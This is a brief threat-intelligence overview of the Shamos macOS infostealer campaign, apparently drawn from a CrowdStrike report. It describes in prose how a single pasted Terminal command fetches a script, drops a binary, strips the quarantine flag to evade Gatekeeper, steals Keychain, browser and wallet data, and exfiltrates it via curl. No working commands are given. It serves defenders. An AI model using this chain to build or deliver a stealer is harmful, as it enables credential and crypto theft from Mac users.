Overview

• CrowdStrike reports more than 300 attempted Shamos deliveries in customer environments from June to August 2025 and links the campaign to COOKIE SPIDER.
• Attackers drive victims to mac-safer[.]com and rescue-mac[.]com via malicious search ads and to a deceptive GitHub repo posing as iTerm2, where instructions prompt a single Terminal command.
• The command decodes a URL, retrieves a Bash script, places a Mach-O in /tmp, removes the quarantine flag with xattr, sets execution via chmod, and launches the stealer to evade Gatekeeper.
• Shamos runs anti-VM checks, uses AppleScript for reconnaissance, hunts for browser credentials, Keychain items, Apple Notes and wallet files, then exfiltrates data as out.zip or out.zip.i2 via curl.
• When run with sudo, it creates a com.finder.helper.plist LaunchDaemon for persistence and can drop extras like a spoofed Ledger Live app or a botnet module, prompting advice to avoid untrusted Terminal commands.